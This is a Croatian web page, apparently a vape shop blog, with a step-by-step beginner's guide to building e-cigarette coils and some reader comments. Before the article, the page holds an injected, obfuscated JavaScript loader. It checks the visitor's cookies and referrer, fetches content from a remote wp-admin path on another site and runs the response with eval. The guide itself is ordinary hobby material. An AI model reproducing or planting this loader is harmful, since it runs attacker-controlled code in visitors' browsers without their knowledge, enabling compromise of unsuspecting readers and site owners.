;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Vodič za izradu grijača za početnike — Kako napraviti svoju prvu zavojnicu

Izrada vlastite zavojnice umijeće je koje svakom korisniku e-cigareta može koristiti. Ipak, potrebno je vrijeme i praksa da se postigne savršenstvo. Izrada zavojnica stekla je popularnost ponajviše iz dva razloga – dugoročno košta manje, a opcije prilagodbe mogu u potpunosti promijeniti vaše iskustvo vapinga.

Pogledajmo kako to u praksi izgleda s ovim detaljnim vodičem za izradu zavojnica za početnike.

Što će vam trebati da napravite svoju prvu zavojnicu

Prije nego počnete raditi zavojnice, potrebno je da budete opremljeni svim potrebnim alatima i hardverom potrebnim za posao. Osnovni komplet za izradu grijača sadrži sve što vam je potrebno, a mnogi ga proizvođači imaju u svojoj ponudi kako ne bi sve dijelove morali nabavljati zasebno.

Ispod je potpuni popis potrebnih alata:

 • Žica – Kanthal, nehrđajući čelik, nikal, nihrom, titan…
 • Sječice za žicu – Visoko precizni rezači žice za blizak, uredan rez
 • Pinceta s keramičkim vrhom – potrebna za uklanjanje žarišnih točaka i druge zadatke
 • Kratka metalna šipka – Po mogućnosti mali odvijač dovoljno tanak za ispravno namotavanje
 • Organski pamuk – bilo koja vrsta vate namijenjene za vape
 • Škare – Za rezanje vate

U nastavku su neki dodaci koji također mogu biti od koristi iako nisu neophodni:

 • Ohmmetar – ili bilo koji uređaj koji očitava vrijednost otpora
 • Pribor za zavojnicu – da biste lakše omotali zavojnicu (uglavnom se sastoji od šipki za namotavanje različitih debljina)

Odabir prave vrste žice

Postoji pet uobičajenih vrsta žičanog materijala koji se koriste za izgradnju zavojnica. Među ovih pet, samo žica od nehrđajućeg čelika može se koristiti i za power mod i za kontrolu temperature.

Međutim, svaka žica pružit će posebno iskustvo vapinga u smislu okusa, kvalitete oblaka, brzine zagrijavanja i jednostavnosti korištenja. Za sve detalje o svakoj od vrsta posjetite naš članak žice za vape, a mi bi za početak apsolutnom početniku preporučili Kanthal.

Što trebate znati prije nego što počnete

Prije nego što uronite u svijet izgradnje zavojnica i eksperimentiranja, postoje neki preduvjeti koji su nužni za dobar i siguran rezultat. Prvo, solidno znanje o sigurnosti baterija će vas spasiti od nezgoda. Drugo, uvijek bi trebali imati svoj alat pri ruci. Na kraju, trebali biste imati barem osnovno znanje o Ohmovom zakonu.

Od iznimne je važnosti da vam sigurnost bude na prvom mjestu. Ako koristite mehanički mod, mala pogreška u proračunu može dovesti do ozljede. Početnicima je preporučljivo koristiti jednu zavojnicu s otporom oko 0,50Ω, te smanjiti ovu vrijednost samo kada imaju dovoljno iskustva u izradi grijača.

Broj namotaja zavojnice utjecat će na vrijednost otpora. Postoje internetski alati kao što je Steam Engine koji vam pomažu da izračunate otpor vašeg podešavanja unosom promjera žice, promjera zavojnice i broja namotaja.

Osim toga, trebali biste imati osnovno razumijevanje ograničenja snage vašeg moda i baterija. Otpor zavojnice treba odabrati u skladu s ograničenjima snage vaše baterije za siguran rad.

Koju debljinu žice koristiti?

Osim odluke koju vrstu žice trebate koristiti, također je ključno pronaći odgovarajući promjer žice za korištenje. Vrijednost za promjer same žice vidjet ćete na pakiranju naznačenu oznakom GA (gauge). Ukratko, što je veća brojčana vrijednost promjera žice, to je žica tanja i otpor je veći. Vrijedi i suprotno. To znači da će krajnji otpor zavojnice biti veći na zavojnici s pet namotaja žice 26ga promjera nego na zavojnici s pet namotaja žice 24ga promjera.

Izrada zavojnice korak po korak

Odrežite komad žice

Prije nego što počnete, uvijek koristite rezače žice kako biste dobili čisti komad žice za vaping (približno 10-15cm duljine). Kanthal žica je istaknuti prijedlog za početnike.

Namotavanje zavojnice

Korištenje odvijača: Jednostavno držite odvijač jednom rukom, a drugom počnite omotavati svoj komad žice oko njega. Držite napetost jakom tako da zavoji budu čvrsti (za učinkovitu vodljivost) i izbjegavajte preklapanje žice. Nastavite dok ne dobijete ispravan broj namotaja za željeni otpor (možete koristiti vape aplikacije za lakše računanje), a pritom pazite da oba kraja žice budu poravnana u istom smjeru (kao noge).

Coil Jig: Ovo je specijaliziran pribor koji vam pomaže da pripremite zavojnicu. Pogledajte uputstva za upotrebu kako bi razumjeli kako se točno ovaj alat koristi.

Postavljanje zavojnice

Počnite s rastavljanjem atomizera, a zatim držite odvijač/šipku s namotanom žicom iznad postolja za postavljanje grijača (build deck). Umetnite jedan krak žice u negativni utor, a drugi u pozitivni utor. Držite žicu što je moguće ravnije i pazite da zavojnica bude na sredini. Na kraju, povucite odvijač/šipku tako da bude odvojen od namotane žice i pričvrstite vijke za zavojnicu.

Ispitivanje kratkih spojeva

Ovdje će vam trebati vaš ohm-metar. Prije korištenja nove zavojnice, preporučljivo je provjeriti vrijednost otpora zavojnice kako biste osigurali siguran rad i spriječili kratke spojeve. Ako vaš čitač oma pokaže kratki spoj, provjerite kontakte atomizera i zavojnice te se uvjerite da grijač ne dodiruje dno ili stijenke isparivača. Ako problemi potraju, pokušajte ponovno postaviti zavojnicu.

Test i uklanjanje hot spotova

Nakon što odredite otpor vaše zavojnice, vrijeme je za prvi test. Stavite atomizer na mod i držite tipku za paljenje sve dok zavojnica ne počne svijetliti crveno od topline (ovo radite samo ukoliko koristite Kanthal ili SS žicu, ostale materijale izbjegavamo paliti na suho). U ovom trenutku pincetom uštipnite užarenu zavojnicu kako biste uklonili nedosljednosti poput točaka koje ne svijetle ili jedne strane koja se zagrijava brže od druge. Nastavite dok ne dobijete ujednačenu zavojnicu koja se grije od sredine prema van.

Postavljanje vate

Nakon što se vaša zavojnica ohladi, vrijeme je da dodate svoju vatu koja će služiti za natapanje e-tekućine. Preporuča se korištenje organskog pamuka, po mogućnosti onog koji ćete kupiti u specijaliziranim vape trgovinama.

Najprije škarama odrežite dovoljan komad pamuka, a zatim ga uvucite u zavojnicu, pazeći da ostavite malo viška s obje strane zavojnice. Ovi krajevi trebali bi biti dovoljno dugi za pravilno postavljanje u atomizer, ali budite oprezni jer bi previše vate moglo uzrokovati začepljenje te nedovoljno natapanje.

Određivanje prave količine vate je priča sama za sebe i trebat će vam vremena da ovo usavršite. Ipak, postoje dva osnovna pravila uz pomoć kojih ćete znali jeste li koristili previše ili premalo vate. Ukratko, ako vata zagara i daje okus paljevina, koristili ste previše vate ili vata nije dobro postavljena. S druge strane, ako vaš atomizer curi te tekućina izlazi kroz otvore za zrak, vjerojatno ste koristili premalo vate ili vata nije dobro postavljena.

Završno testiranje

Prije nego što krenete s parenjem, izvršite neke preliminarne provjere. Prvo, provjerite još jednom otpor zavojnice i podesite snagu moda u skladu s tim. Također, provjerite jesu li svi priključci i vijci koje ste odvojili tijekom izrade zavojnice na mjestu gdje bi trebali biti. Nakon što su svi sustavi spremni za rad, vrijeme je da uberete svoju nagradu!

Sretno!

Tags:
Choose your Reaction!
 • Nakon pola godine koliko sam na RTA atomizerima i ručnoj izradi grijača, pomalo su mi se iskristalizirale neke stvari.
  Definitivno su mi najbolji grijači koje izrađujem od Ni80 žice, promjera 2,5mm i otpora između 0.7 Ohma i 0.85 Ohma.
  Do sada niti jedan put mi se nije dogodilo da mi izrada grijača nije uspjela a nisam uočio ni hot spotove na istima.
  Sad sam došao do toga da mi grijač kad ga izradim izgleda k’o iz dućana ;)

 • Draga Simona,

  može li malo detaljnije objašnjenje ove rečenice: “U ovom trenutku pincetom uštipnite užarenu zavojnicu kako biste uklonili nedosljednosti poput točaka koje ne svijetle ili jedne strane koja se zagrijava brže od druge.”

  Kako da uštipnemo i gdje?

  Hvala :)

  • Prevuces par puta malim srfcigercicem ili za pincetom koja ima metalni ili keramicki vrh da skines necistoce sa grejaca ako su kojim slucajem ostali, naravno zagrejes grejac pa pustis dugme za aktivaciju nikako da drzis dugme (gumb) i da dodirujes metalnim krajevima grejac, najbolje da stavis mod na 8-9W

  • Oprosti Iva, nisam vidjela ranije komentar jer ima brdo članaka pa ne uspijevam sve ispratiti. Uglavnom, ako vidiš da se na grijaču pojavljuju neke užarene točke ili pak točke koje se ne griju uopće, samo malo pincetom štipneš cijeli grijač ili ga malo nježno “ostružeš”. To bi trebalo izjednačiti stvari. Za ovo se koristi keramička pinceta da ne bi bilo problema. :D

Leave a Comment